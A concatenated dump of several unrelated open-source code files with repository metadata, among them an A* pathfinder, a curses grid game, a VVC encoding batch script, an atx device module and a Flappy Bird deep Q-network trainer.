f631f0ad314cc54e012f56dd0631e587b44f8930 | dd449ad8388847779b265f49f2339c9681376c60 | /a_star_algo/algo.py | 2d3e0aea892a843f490f31666f9a20dbc5402a30 | [] | no_license | whoji/training-ground | 478d76a8c274050eb910b28729ca1d1cdb47eae9 | b107cc47c4a04bb8868c410ab207bacab5a86e4c | refs/heads/master | 2020-05-16T16:13:26.788156 | 2019-12-04T01:56:01 | 2019-12-04T01:56:01 | 183,154,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,369 | py | # https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2
class Node():
"""A node class for A* Pathfinding"""
def __init__(self, parent=None, position=None):
self.parent = parent
self.position = position
self.g = 0 # G is the distance between the current node and the start node.
self.h = 0. # H is the heuristic - estimated distance from the current node to the end node.
# using the Eucleandian distance squared : a2 + b2 = c2
self.f = 0. # F is the total cost of the node.
def __eq__(self, other):
return self.position == other.position
def get_node_with_smallest_f(open_list):
assert open_list != []
current_node = open_list[0]
current_index = 0
for index, item in enumerate(open_list):
if item.f < current_node.f:
current_node = item
current_index = index
return current_node, current_index
def get_path_to_node(current_node):
path = []
current = current_node
while current is not None:
path.append(current.position)
current = current.parent
return path[::-1] # Return reversed path
def get_children_nodes(current_node, maze):
# get all the children / neighbors
children = []
for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)]:
# Adjacent squares
node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])
if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0:
continue
if maze[node_position[0]][node_position[1]] != 0:
continue
new_node = Node(current_node, node_position)
children.append(new_node)
return children
def AStar(maze, start, end):
# Returns a list of tuples as a path from the
# given start to the given end in the given maze
# Create start and end node
start_node = Node(None, start)
start_node.g = start_node.h = start_node.f = 0
end_node = Node(None, end)
end_node.g = end_node.h = end_node.f = 0
# Initialize both open and closed list
open_list = [] # like a frontier
closed_list = [] # like where we camre from
# Add the start node
open_list.append(start_node)
# Loop until you find the end
while len(open_list) > 0:
# Get the current node
current_node, current_index = get_node_with_smallest_f(open_list)
# Pop current off open list, add to closed list
open_list.pop(current_index)
closed_list.append(current_node)
# Found the goal
if current_node == end_node:
# print("DONE")
return get_path_to_node(current_node)
children = get_children_nodes(current_node, maze)
children = [c for c in children if c not in closed_list]
for child in children:
child.g = current_node.g + 1
child.h = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)
child.f = child.g + child.h
for open_node in open_list:
if child == open_node and child.g > open_node.g:
continue
open_list.append(child) | [
"minli1985@gmail.com"
] | minli1985@gmail.com |
d680f8875b14ff6b14fad6a3d87412f63c377f03 | 2dd0082221239fef0e0894c852f70f1eaeb62b9e | /Assignments/pete/python/curses/curses8/curses7.py | 58231c63220cd044d2e1c7060580b9eaab06acdc | [] | no_license | pjz987/2019-10-28-fullstack-night | 03097cf3dc24aeec0c326044bb0fc99385fbc333 | 4c643013de73f08d7503d62ec602d6a5c80ffa7e | refs/heads/master | 2022-11-11T19:40:00.296645 | 2020-06-25T16:14:47 | 2020-06-25T16:14:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,750 | py | import argparse
import curses
parser = argparse.ArgumentParser()
parser.add_argument('-lvl', action='store', dest='version_arg', type=int)
parsed_args = parser.parse_args()
LEVEL = parsed_args.version_arg or 1
import random
import time
'''
Above argparse and curses are imported and set up.#and numpy
Below I will establish the Classes before getting into the different LEVELs.
'''
class Sprite():
def __init__(self, y, x, uni):
self.y = y
self.x = x
self.uni = uni
def __str__(self):
return self.uni
class Item(Sprite):
def __init__(self, y, x, uni, id, uses, range):
super().__init__(y, x, uni)
self.id = id
self.uses = uses
self.range = range
def __repr__(self):
return f"{self.uni}:{self.uses}/{self.range}"
class Character(Sprite):
def __init__(self, y, x, uni, uni2):
super().__init__(y, x, uni)
self.uni2 = uni2
self.inv = []
def __str__(self):
return self.uni#, self.uni2
def mouth_string(self):
return self.uni2
def move(self, direction, steps):
# change the y/x position of the character
pass
def attack(self, direction, weapon):
#attack and everything
pass
hero = Character(13, 46, '{00}', '-__-')
enemies = [
Character(1, 96, '|><|', '|==|'),
Character(7, 26, '|><|', '|==|'),
Character(10, 61, '|><|', '|==|'),
Character(13, 41, '|><|', '|==|'),
]
def gen_enemies(hero, enemies, num=4):
tiles = []
# [tiles.append(coord) for ]
for y in range(23):
for x in range(97):
if y % 3 == 1 and x % 5 == 1:
tiles.append((y, x))
tiles.remove((hero.y, hero.x))
for i in range(num):
co_ord = random.choice(tiles)
y = co_ord[0]
x = co_ord[1]
enemy = Character(y, x, '|><|', '|==|')
enemies.append(enemy)
tiles.remove((co_ord))
return tiles
enemies = []
enemies_num = random.randrange(3, 7)
tiles = gen_enemies(hero, enemies, enemies_num)
def gen_items(item_attr_list, tiles, num=3):
items = []
for i in range(num):
co_ord = random.choice(tiles)
tiles.remove(co_ord)
y = co_ord[0]
x = co_ord[1]
item_attr = random.choice(item_attr_list)
item = Item(y, x, item_attr[0], item_attr[1], item_attr[2], item_attr[3])
items.append(item)
return items
# items = [
# Item(20, 16, '🏹', 'bow'),
# Item(19, 5, '🔫', 'gun')
# ]
item_attr_list = [
('🏹', 'bow', 1, 10),
('🗡', 'sword', 3, 1),
('🔫', 'gun', 2, 5)
]
items_num = random.randrange(2, 5)
items = gen_items(item_attr_list, tiles, items_num)
unicode_storage_list = ['🗡', '⚔', '🔫', '🏹', '🛡', '🔑', '🗝', '❤', '☠', '☠', '⬆', '➡', '⬇', '⬅']
moves = [[0, 1], [0, -1], [1, 0], [-1, 0]]
key_list = ['KEY_UP', 'KEY_DOWN', 'KEY_RIGHT', 'KEY_LEFT']
def fix_pos(sprite): #converted this from function to method
if sprite.y < 1:
sprite.y = 1
if sprite.y > 22:
sprite.y = 22
if sprite.x < 1:
sprite.x = 1
if sprite.x > 96:
sprite.x = 96
def aim(hero, wasd):#converted
if wasd == 'w':
game_screen.addstr(hero.y - 1, hero.x, '⬆')
elif wasd == 'a':
game_screen.addstr(hero.y, hero.x - 1, '⬅')
elif wasd == 's':
game_screen.addstr(hero.y + 1, hero.x, '⬇')
elif wasd == 'd':
game_screen.addstr(hero.y, hero.x + 2, '➡')
draw_screen(hero, enemies, items, game_screen)
def shoot(hero, enemies, aim_dir, game_screen):#converted
if hero.inv:
for enemy in enemies:
if (aim_dir == 'w' and hero.x == enemy.x and hero.y > enemy.y) or (aim_dir == 'a' and hero.y == enemy.y and hero.x > enemy.x) or (aim_dir == 's' and hero.x == enemy.x and hero.y < enemy.y) or (aim_dir == 'd' and hero.y == enemy.y and hero.x < enemy.x):
enemy.uni = '☠'
draw_screen(hero, enemies, items, game_screen)
time.sleep(1)
enemies.remove(enemy)
hero.inv[0].uses -= 1
if hero.inv[0].uses == 0:
hero.inv.remove(hero.inv[0])
def enemy_move(hero, enemies):
for enemy in enemies:
y_or_x = random.choice(['y', 'x'])
if enemy.y == hero.y:
y_or_x = 'x'
elif enemy.x == hero.x:
y_or_x = 'y'
if y_or_x == 'y':
if enemy.y > hero.y:
enemy.y -= 3
else:
enemy.y += 3
else:
y_or_x == 'x'
if enemy.x > hero.x:
enemy.x -= 5
else:
enemy.x += 5
fix_pos(enemy)
def draw_screen(hero, enemies, items, game_screen):
game_screen.clear()
for y in range(26):
for x in range(100):
if x % 5 == 0 :
game_screen.addstr(y, x, '|')
if y % 3 == 0:
game_screen.addstr(y, x, '-')
if dead == True:
hero.uni = '☠'
game_screen.addstr(1, 1, "AND YOU DEAD")
[game_screen.addstr(item.y + 1, item.x + 1, str(item)) for item in items]
[game_screen.addstr(enemy.y, enemy.x, str(enemy)) for enemy in enemies]
[game_screen.addstr(enemy.y + 1, enemy.x, enemy.mouth_string()) for enemy in enemies]
game_screen.addstr(hero.y, hero.x, str(hero))
game_screen.addstr(hero.y + 1, hero.x, hero.mouth_string())
game_screen.addstr(25, 1, f"Inventory: {hero.inv}")
game_screen.addstr(25, 35, f"Screen Size: {game_screen.getmaxyx()}")
game_screen.addstr(25, 70, f"Hero Postion: {hero.y, hero.x}")
if won:
game_screen.addstr(1, 1, "YOU WON!")
# game_screen.addstr(2, 1, f"{game_screen.getmaxyx()}")
game_screen = curses.initscr()
curses.curs_set(0)
print(game_screen.getmaxyx())
won = False
dead = False
game_screen.keypad(True)
game_screen.clear()
draw_screen(hero, enemies, items, game_screen)
game_screen.addstr(2, 41, "Arrow Keys To Move")
game_screen.addstr(5, 41, "WASD To Aim")
game_screen.addstr(8, 41, "SPACE To Shoot")
# game_screen.addstr(hero.y, hero.x, str(hero))
# game_screen.addstr(hero.y + 1, hero.x, hero.mouth_string())
# [game_screen.addstr(item.y, item.x, str(item)) for item in items]
# [game_screen.addstr(enemy.y, enemy.x, str(enemy)) for enemy in enemies]
# [game_screen.addstr(enemy.y + 1, enemy.x, enemy.mouth_string()) for enemy in enemies]
# game_screen.addstr(21, 5, f"Inventory: {hero.inv}")
# for enemy in enemies:
# game_screen.addstr(enemy.y, enemy.x, str(enemy))
while True:
in_key = game_screen.getkey()
if in_key == 'q':
curses.endwin()
break
for enemy in enemies:
if enemy.x == hero.x and enemy.y == hero.y:
dead = True
if dead == False and in_key in ['KEY_UP', 'KEY_DOWN', 'KEY_RIGHT', 'KEY_LEFT']:
if in_key == key_list[0]:
hero.y -= 3
elif in_key == key_list[1]:
hero.y += 3
elif in_key == key_list[2]:
hero.x += 5
elif in_key == key_list[3]:
hero.x -= 5
fix_pos(hero)
for item in items:
if item.y == hero.y and item.x == hero.x:
hero.inv.append(item)
items.remove(item)
enemy_move(hero, enemies)
if dead == False and in_key in ['w', 'a', 's', 'd']:
aim(hero, in_key)
aim_dir = in_key
draw_screen(hero, enemies, items, game_screen)
if dead == False and in_key == ' ':
shoot(hero, enemies, aim_dir, game_screen)
enemy_move(hero, enemies)
if enemies == []:
won = True
draw_screen(hero, enemies, items, game_screen)
# print(game_screen.getmaxyx()) | [
"pwj2012@gmail.com"
] | pwj2012@gmail.com |
2c1dcce271be95ff71696e0634eac1611b1af8d3 | 81acce1d49924d89e6ebf5a472ad5b1b80cc202c | /qcdScale/qcdFitter.py | 7650be090a5d03a503d1e3c513a0cb4b5ae83b62 | [] | no_license | truggles/Z_to_TauTau_13TeV | 36a85b024052fcfef3c9efd8aebc63dc85744f7b | 123fe0d25f8e926d8959f54cd4f64122394b60d5 | refs/heads/master | 2021-03-13T01:50:43.031581 | 2017-10-12T18:56:25 | 2017-10-12T18:56:25 | 37,312,811 | 0 | 0 | null | 2016-09-29T08:29:13 | 2015-06-12T09:08:22 | Python | UTF-8 | Python | false | false | 449 | py | import ROOT
from ROOT import gROOT
def qcdFit() :
f = ROOT.TFile('roots/OSvsSS.root','r')
h = f.Get('OSvsSS')
func = ROOT.TF2( 'func', '[0] + (x * [1]) +(y *[2])' )
f1 = gROOT.GetFunction('func' )
f1.SetParName( 0, 'Intercept' )
f1.SetParName( 1, 'x-slope' )
f1.SetParName( 2, 'y-slope' )
f1.SetParameter( 0, 99 )
f1.SetParameter( 1, 99 )
f1.SetParameter( 2, 99 )
h.Fit('func', 'R' )
qcdFit()
| [
"truggles@wisc.edu"
] | truggles@wisc.edu |
8e165645b9a092e4faa7392ab4052d978f7ea58e | 222d7bd1c7fba8d2cfe2754ae1b07e7219ff854e | /Run_VVC-bu.py | f3bfd8de137923efe4c4b3154638e4586b7ebb46 | [] | no_license | mkjubran/VVCS | 70981f1a64f380c2b3d04e138a46bf545d8b1bf7 | 79ffb3cbe25a48848eb2b4dbadc908f053c3f8f1 | refs/heads/master | 2020-12-22T09:48:42.629357 | 2020-07-14T07:24:23 | 2020-07-14T07:24:23 | 236,737,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,839 | py | #Frame1: Type POC QPoffset QPOffsetModelOff QPOffsetModelScale CbQPoffset CrQPoffset QPfactor tcOffsetDiv2 betaOffsetDiv2 temporal_id #ref_pics_active #ref_pics reference
#pictures predict deltaRPS #ref_idcs reference idcs print >> fid, 'Frame1: P 1 5 -6.5 0.2590 0 0 1.0 0 0 0 1 1 -1 0');
from __future__ import division
import numpy as np
import os, sys, subprocess, pdb
import argparse
import ConfigParser
import datetime, math, time
import ntpath
INF = 999  # "infinity" sentinel; not referenced anywhere in this script
###--------------------------------------------------------------
## Parse configuration Parameters from the configuration file
def main(argv=None):
    """Parse the command line, optionally seeded by a -c/--conf_file INI file.

    The [Parametters] section of the config file supplies defaults that the
    explicit command-line options may then override.

    Args:
        argv: full argument vector (argv[0] is the program name); defaults
            to sys.argv when omitted.

    Returns:
        argparse.Namespace with the merged configuration.
    """
    if argv is None:
        argv = sys.argv
    # First pass: parse only -c/--conf_file.  Help is disabled here so that
    # -h falls through to the full parser below and prints every option.
    conf_parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter,
        add_help=False
        )
    conf_parser.add_argument("-c", "--conf_file",
                        help="Specify config file", metavar="FILE")
    # BUG FIX: the original called parse_known_args() with no arguments,
    # which reads sys.argv directly and silently ignores the argv parameter.
    args, remaining_argv = conf_parser.parse_known_args(argv[1:])
    defaults = { "option":"default"}
    if args.conf_file:
        config = ConfigParser.SafeConfigParser()
        config.read([args.conf_file])
        defaults.update(dict(config.items("Parametters")))
    # Second pass: the real parser inherits -c from conf_parser and applies
    # the INI-file values as defaults before parsing the remaining options.
    parser = argparse.ArgumentParser(
        parents=[conf_parser]
        )
    parser.set_defaults(**defaults)
    args = parser.parse_args(remaining_argv)
    return(args)
###--------------------------------------------------------------
def call(cmd):
    """Run *cmd* through the shell and block until it exits."""
    subprocess.call(cmd, shell=True)
    return
###--------------------------------------------------------------
def call_bg(cmd):
    """Launch *cmd* through the shell without waiting.

    Returns the Popen handle; stdout is captured via a pipe so the caller
    can read it later.
    """
    child = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
    return child
###--------------------------------------------------------------
def call_bg_file(cmd,fidProcess):
    """Launch *cmd* through the shell with stdout redirected to *fidProcess*.

    Args:
        cmd: shell command line to run.
        fidProcess: an already-open, writable file object receiving stdout.

    Returns:
        The Popen handle, without waiting for completion.  The parent's copy
        of the file handle is closed right away: Popen has already duplicated
        the descriptor into the child, which keeps writing to it.
    """
    proc = subprocess.Popen(cmd, stdout=fidProcess, shell=True)
    # BUG FIX: the original wrote `fidProcess.close` (missing parentheses),
    # a no-op that leaked the parent's file handle.
    fidProcess.close()
    return proc
###--------------------------------------------------------------
def Encode_decode_video():
    """Encode the configured clip at every target bitrate with the VVC
    reference encoder, decode each bitstream back to YUV, then score the
    reconstructions with VMAF.

    Reads the module-level settings published by __main__: vid, Width,
    Hight, QP, fps, NumFrames, MaxCUSize, MaxPartitionDepth, RateControl,
    rate (list of bitrates) and Path (results directory).
    """
    start_time = datetime.datetime.now()
    print('Encoding {}'.format(start_time.strftime("%Y-%m-%d %H:%M:%S")))
    InputYUV = '{}.yuv'.format(vid[:-4])
    fname = ntpath.basename(InputYUV)[:-4]

    # --- Encoding: launch one encoder per bitrate in parallel, then wait.
    encoder_procs = []
    for bitrate in rate:
        BitstreamFile = '{}/VVCencoded_{}_{}.bin'.format(Path, fname, bitrate)
        ReconYUV = '{}/VVCrecon_{}_{}.yuv'.format(Path, fname, bitrate)
        log_fid = open('{}/VVClog_{}_{}.dat'.format(Path, fname, bitrate), 'w')
        cmd = './VVCOrig/bin/EncoderAppStatic -c ./VVCOrig/cfg/encoder_lowdelay_P_vtm.cfg -c ./VVCOrig/cfg/encoder_VVC_GOP.cfg --InputFile={} --SourceWidth={} --SourceHeight={} --SAO=0 --InitialQP={} --FrameRate={} --FramesToBeEncoded={} --MaxCUSize={} --MaxPartitionDepth={} --BitstreamFile="{}" --RateControl={} --TargetBitrate={} --ReconFile={}'.format(InputYUV, Width, Hight, QP, fps, NumFrames, MaxCUSize, MaxPartitionDepth, BitstreamFile, RateControl, bitrate, ReconYUV)
        encoder_procs.append(call_bg_file(cmd, log_fid))
    for proc in encoder_procs:
        proc.wait()

    # --- Decoding: one decoder per produced bitstream, again in parallel.
    decoder_procs = []
    for bitrate in rate:
        OutputYUV = '{}/VVCoutput_{}_{}.yuv'.format(Path, fname, bitrate)
        BitstreamFile = '{}/VVCencoded_{}_{}.bin'.format(Path, fname, bitrate)
        log_fid = open('{}/VVCdecoderlog_{}_{}.dat'.format(Path, fname, bitrate), 'w')
        decoder_procs.append(call_bg_file('./VVCOrig/bin/DecoderAppStatic -b {} -o {}'.format(BitstreamFile, OutputYUV), log_fid))
    for proc in decoder_procs:
        proc.wait()

    # --- VMAF: scores are appended ('a') to each encoder log file.
    vmaf_procs = []
    for bitrate in rate:
        OutputYUV = '{}/VVCoutput_{}_{}.yuv'.format(Path, fname, bitrate)
        log_fid = open('{}/VVClog_{}_{}.dat'.format(Path, fname, bitrate), 'a')
        vmaf_procs.append(call_bg_file('../vmaf/run_vmaf yuv420p {} {} {} {}'.format(Width, Hight, InputYUV, OutputYUV), log_fid))
    for proc, bitrate in zip(vmaf_procs, rate):
        proc.wait()
        logfile = '{}/VVClog_{}_{}.dat'.format(Path, fname, bitrate)
        ### replace Frame to VMAF_Frame in the log file
        call('./Replace_Frame_to_VMAF_Frame --fn {}'.format(logfile))
    return
##################################################################
## Main Body
if __name__ == "__main__":
   # Parse the command line / configuration file and publish every setting
   # as a module-level global consumed by Encode_decode_video().
   args=main()
   ##Inputs
   vid=args.vid;          # source video path; the .yuv input name is derived from it
   fps=int(args.fps);     # forwarded to --FrameRate
   Width=int(args.w);
   Hight=int(args.h);
   QP=int(args.qp);       # forwarded to --InitialQP
   MaxCUSize=int(args.maxcusize);
   MaxPartitionDepth=int(args.maxpartitiondepth);
   RateControl=int(args.ratecontrol);   # forwarded to --RateControl
   rate_str = args.rate.split(' ')
   rate = [int(r) for r in rate_str]    # one encode/decode/VMAF pass per bitrate
   NumFrames=int(args.numframes)
   Path = args.resultspath              # output directory for bitstreams/logs/YUVs
   Encode_decode_video()
| [
"mjubran@birzeit.edu"
] | mjubran@birzeit.edu |
887a23cdc580ec87b2158ee45d31535b0c0dc08e | 65ed6010531735377d8c0b8a77d0d336842ebe3e | /atx/device/__init__.py | f02e38e70d7453565c1496ce76e0b8f43445816f | [
"BSD-3-Clause",
"MIT"
] | permissive | neteaseknight/AirtestX | 5084a9401777f765e11f70dd02bf3633f5cb66fd | c1fe6581f5f37088cbc486c9f128b6f26b0c7695 | refs/heads/master | 2021-01-17T21:42:27.346213 | 2016-04-03T12:44:10 | 2016-04-03T12:44:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,871 | py | # coding: utf-8
from __future__ import absolute_import
import collections
from atx import imutils
# Result of a screen-image match: position, match confidence, the matching
# method used, and whether a match was actually found.
FindPoint = collections.namedtuple('FindPoint', ['pos', 'confidence', 'method', 'matched'])
# Screen size in pixels.
Display = collections.namedtuple('Display', ['width', 'height'])
# Plain (left, top, right, bottom) record; extended by the Bounds class below.
__boundstuple = collections.namedtuple('Bounds', ['left', 'top', 'right', 'bottom'])
class Bounds(__boundstuple):
    """Immutable (left, top, right, bottom) rectangle with helpers."""

    def __init__(self, *args, **kwargs):
        super(Bounds, self).__init__(*args, **kwargs)
        # Cache for the `area` property, filled on first access.
        self._area = None

    def is_inside(self, x, y):
        """True when the point (x, y) lies strictly inside the rectangle."""
        return self.left < x < self.right and self.top < y < self.bottom

    @property
    def area(self):
        """Rectangle area, computed lazily and cached."""
        if not self._area:
            self._area = (self.right - self.left) * (self.bottom - self.top)
        return self._area

    @property
    def center(self):
        """(x, y) midpoint of the rectangle."""
        return (self.left + self.right) / 2, (self.top + self.bottom) / 2

    def __mul__(self, mul):
        """Scale every coordinate by *mul*, truncating to int."""
        return Bounds(*[int(coord * mul) for coord in self])
class Pattern(object):
def __init__(self, image, offset=(0, 0), anchor=0, rsl=None, resolution=None):
"""
Args:
image: image filename or image URL
offset: offset of image center
anchor: not supported
resolution: image origin screen resolution
rsl: alias of resolution
"""
self._name = None
self._image = imutils.open(image)
self._offset = offset
self._resolution = rsl or resolution
if isinstance(image, basestring):
self._name = image
    def __str__(self):
        # e.g. "Pattern(name: button.png, offset: (0, 0))"
        return 'Pattern(name: {}, offset: {})'.format(self._name, self.offset)
    @property
    def image(self):
        # Image data as loaded by imutils.open() in the constructor.
        return self._image
    @property
    def offset(self):
        # Offset of the image center, as passed to the constructor.
        return self._offset
@property
def resolution(self):
return self._resolution | [
"codeskyblue@gmail.com"
] | codeskyblue@gmail.com |
dec4a2fb41492241dfdefc7038a33d1f48fa4b13 | 9fa08002daf2e991ff9dfe33ab47c4518976cc12 | /DeepLearing/DeepLearningFlappyBird-master/deep_q_network.py | abdb40aeef2860bb55123cb5bb6e8f77f8267cd3 | [
"MIT"
] | permissive | freeflyfish/code_file | 6e1264de2c13d700895bde31421ca791802f1ac6 | e80cc440f1c969af417bc5bad73c61b50dfa7590 | refs/heads/master | 2020-04-30T22:10:06.929633 | 2018-12-07T10:31:04 | 2018-12-07T10:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,232 | py |
from __future__ import print_function
import tensorflow as tf
import cv2
import sys
sys.path.append("game/")
import game.wrapped_flappy_bird as game
import random
import numpy as np
from collections import deque
GAME = 'bird' # the name of the game being played for log files
ACTIONS = 2 # number of valid actions
GAMMA = 0.99 # decay rate of past observations
OBSERVE = 100000. # timesteps to observe before training
EXPLORE = 2000000. # frames over which to anneal epsilon
FINAL_EPSILON = 0.0001 # final value of epsilon
INITIAL_EPSILON = 0.0001 # starting value of epsilon
REPLAY_MEMORY = 50000 # number of previous transitions to remember
BATCH = 32 # size of minibatch
FRAME_PER_ACTION = 1 # choose a new action every this many frames
def weight_variable(shape):
    """Weight tensor of the given shape, drawn from a truncated normal (stddev 0.01)."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.01))
def bias_variable(shape):
    """Bias tensor of the given shape, initialised to the constant 0.01."""
    return tf.Variable(tf.constant(0.01, shape=shape))
def conv2d(x, W, stride):
    """2-D convolution of x with kernel W, equal H/W stride, SAME padding."""
    strides = [1, stride, stride, 1]
    return tf.nn.conv2d(x, W, strides=strides, padding="SAME")
def max_pool_2x2(x):
    """2x2 max pooling with stride 2 and SAME padding."""
    window = [1, 2, 2, 1]
    return tf.nn.max_pool(x, ksize=window, strides=window, padding="SAME")
def createNetwork():
    """Build the Q-network: three conv layers plus two fully connected layers.

    Returns (input placeholder, per-action Q-value readout, first FC layer).
    """
    # Parameters are created in exactly the original order so that TF
    # variable names — and therefore saved checkpoints — stay compatible.
    conv1_w = weight_variable([8, 8, 4, 32])
    conv1_b = bias_variable([32])
    conv2_w = weight_variable([4, 4, 32, 64])
    conv2_b = bias_variable([64])
    conv3_w = weight_variable([3, 3, 64, 64])
    conv3_b = bias_variable([64])
    fc1_w = weight_variable([1600, 512])
    fc1_b = bias_variable([512])
    fc2_w = weight_variable([512, ACTIONS])
    fc2_b = bias_variable([ACTIONS])
    # Input: stack of the 4 most recent 80x80 binarised frames.
    s = tf.placeholder("float", [None, 80, 80, 4])
    # Hidden layers: conv(stride 4) -> pool -> conv(stride 2) -> conv(stride 1).
    h_conv1 = tf.nn.relu(conv2d(s, conv1_w, 4) + conv1_b)
    h_pool1 = max_pool_2x2(h_conv1)
    h_conv2 = tf.nn.relu(conv2d(h_pool1, conv2_w, 2) + conv2_b)
    h_conv3 = tf.nn.relu(conv2d(h_conv2, conv3_w, 1) + conv3_b)
    h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])
    h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, fc1_w) + fc1_b)
    # Readout layer: one linear Q-value per action.
    readout = tf.matmul(h_fc1, fc2_w) + fc2_b
    return s, readout, h_fc1
def trainNetwork(s, readout, h_fc1, sess):
    """Run the (endless) DQN training loop on Flappy Bird.

    Args:
        s: input placeholder, batch of 80x80x4 frame stacks.
        readout: per-action Q-value output of the network.
        h_fc1: first fully-connected layer (used only by the commented-out logging).
        sess: TensorFlow session everything runs in.
    """
    # define the cost function: squared error between target y and the
    # Q-value of the action actually taken (selected via the one-hot `a`)
    a = tf.placeholder("float", [None, ACTIONS])
    y = tf.placeholder("float", [None])
    readout_action = tf.reduce_sum(tf.multiply(readout, a), reduction_indices=1)
    cost = tf.reduce_mean(tf.square(y - readout_action))
    train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)
    # open up a game state to communicate with emulator
    game_state = game.GameState()
    # store the previous observations in replay memory
    D = deque()
    # printing (only used by the commented-out logging block at the bottom)
    a_file = open("logs_" + GAME + "/readout.txt", 'w')
    h_file = open("logs_" + GAME + "/hidden.txt", 'w')
    # get the first state by doing nothing and preprocess the image to 80x80x4
    do_nothing = np.zeros(ACTIONS)
    do_nothing[0] = 1
    x_t, r_0, terminal = game_state.frame_step(do_nothing)
    x_t = cv2.cvtColor(cv2.resize(x_t, (80, 80)), cv2.COLOR_BGR2GRAY)
    ret, x_t = cv2.threshold(x_t,1,255,cv2.THRESH_BINARY)
    s_t = np.stack((x_t, x_t, x_t, x_t), axis=2)
    # saving and loading networks: resume from the latest checkpoint if any
    saver = tf.train.Saver()
    sess.run(tf.initialize_all_variables())
    checkpoint = tf.train.get_checkpoint_state("saved_networks")
    if checkpoint and checkpoint.model_checkpoint_path:
        saver.restore(sess, checkpoint.model_checkpoint_path)
        print("Successfully loaded:", checkpoint.model_checkpoint_path)
    else:
        print("Could not find old network weights")
    # start training (the loop condition is always true — runs forever)
    epsilon = INITIAL_EPSILON
    t = 0
    while "flappy bird" != "angry bird":
        # choose an action epsilon greedily
        readout_t = readout.eval(feed_dict={s : [s_t]})[0]
        a_t = np.zeros([ACTIONS])
        action_index = 0
        if t % FRAME_PER_ACTION == 0:
            if random.random() <= epsilon:
                print("----------Random Action----------")
                action_index = random.randrange(ACTIONS)
                # NOTE(review): a second randrange() call — the executed
                # action can differ from the printed/logged action_index.
                a_t[random.randrange(ACTIONS)] = 1
            else:
                action_index = np.argmax(readout_t)
                a_t[action_index] = 1
        else:
            a_t[0] = 1 # do nothing
        # scale down epsilon (linear anneal once past the observe phase)
        if epsilon > FINAL_EPSILON and t > OBSERVE:
            epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE
        # run the selected action and observe next state and reward
        x_t1_colored, r_t, terminal = game_state.frame_step(a_t)
        x_t1 = cv2.cvtColor(cv2.resize(x_t1_colored, (80, 80)), cv2.COLOR_BGR2GRAY)
        ret, x_t1 = cv2.threshold(x_t1, 1, 255, cv2.THRESH_BINARY)
        x_t1 = np.reshape(x_t1, (80, 80, 1))
        #s_t1 = np.append(x_t1, s_t[:,:,1:], axis = 2)
        # new frame goes in front, oldest of the 4 stacked frames is dropped
        s_t1 = np.append(x_t1, s_t[:, :, :3], axis=2)
        # store the transition in D (bounded replay memory)
        D.append((s_t, a_t, r_t, s_t1, terminal))
        if len(D) > REPLAY_MEMORY:
            D.popleft()
        # only train if done observing
        if t > OBSERVE:
            # sample a minibatch to train on
            minibatch = random.sample(D, BATCH)
            # get the batch variables
            s_j_batch = [d[0] for d in minibatch]
            a_batch = [d[1] for d in minibatch]
            r_batch = [d[2] for d in minibatch]
            s_j1_batch = [d[3] for d in minibatch]
            y_batch = []
            readout_j1_batch = readout.eval(feed_dict = {s : s_j1_batch})
            for i in range(0, len(minibatch)):
                terminal = minibatch[i][4]
                # if terminal, only equals reward
                if terminal:
                    y_batch.append(r_batch[i])
                else:
                    y_batch.append(r_batch[i] + GAMMA * np.max(readout_j1_batch[i]))
            # perform gradient step
            train_step.run(feed_dict = {
                y : y_batch,
                a : a_batch,
                s : s_j_batch}
            )
        # update the old values
        s_t = s_t1
        t += 1
        # save progress every 10000 iterations
        if t % 10000 == 0:
            saver.save(sess, 'saved_networks/' + GAME + '-dqn', global_step = t)
        # print info
        state = ""
        if t <= OBSERVE:
            state = "observe"
        elif t > OBSERVE and t <= OBSERVE + EXPLORE:
            state = "explore"
        else:
            state = "train"
        print("TIMESTEP", t, "/ STATE", state, \
            "/ EPSILON", epsilon, "/ ACTION", action_index, "/ REWARD", r_t, \
            "/ Q_MAX %e" % np.max(readout_t))
        # write info to files
        '''
        if t % 10000 <= 100:
            a_file.write(",".join([str(x) for x in readout_t]) + '\n')
            h_file.write(",".join([str(x) for x in h_fc1.eval(feed_dict={s:[s_t]})[0]]) + '\n')
            cv2.imwrite("logs_tetris/frame" + str(t) + ".png", x_t1)
        '''
def playGame():
    """Build the Q-network and start the endless training/playing loop."""
    session = tf.InteractiveSession()
    s, readout, h_fc1 = createNetwork()
    trainNetwork(s, readout, h_fc1, session)
def main():
    """Script entry point."""
    playGame()
if __name__ == "__main__":
    main()
| [
"807745654@qq.com"
] | 807745654@qq.com |
25c239b31c0a578419e6f525d348d98c0f40112a | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-MetalPerformanceShaders/PyObjCTest/test_mpsrayintersector_mpspolygonaccelerationstructure.py | 1a5da10d9a4ea08bb220c5af477a364059d79eaa | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 490 | py | from PyObjCTools.TestSupport import TestCase
import MetalPerformanceShaders
# Objective-C block signature used by the framework's completion handlers:
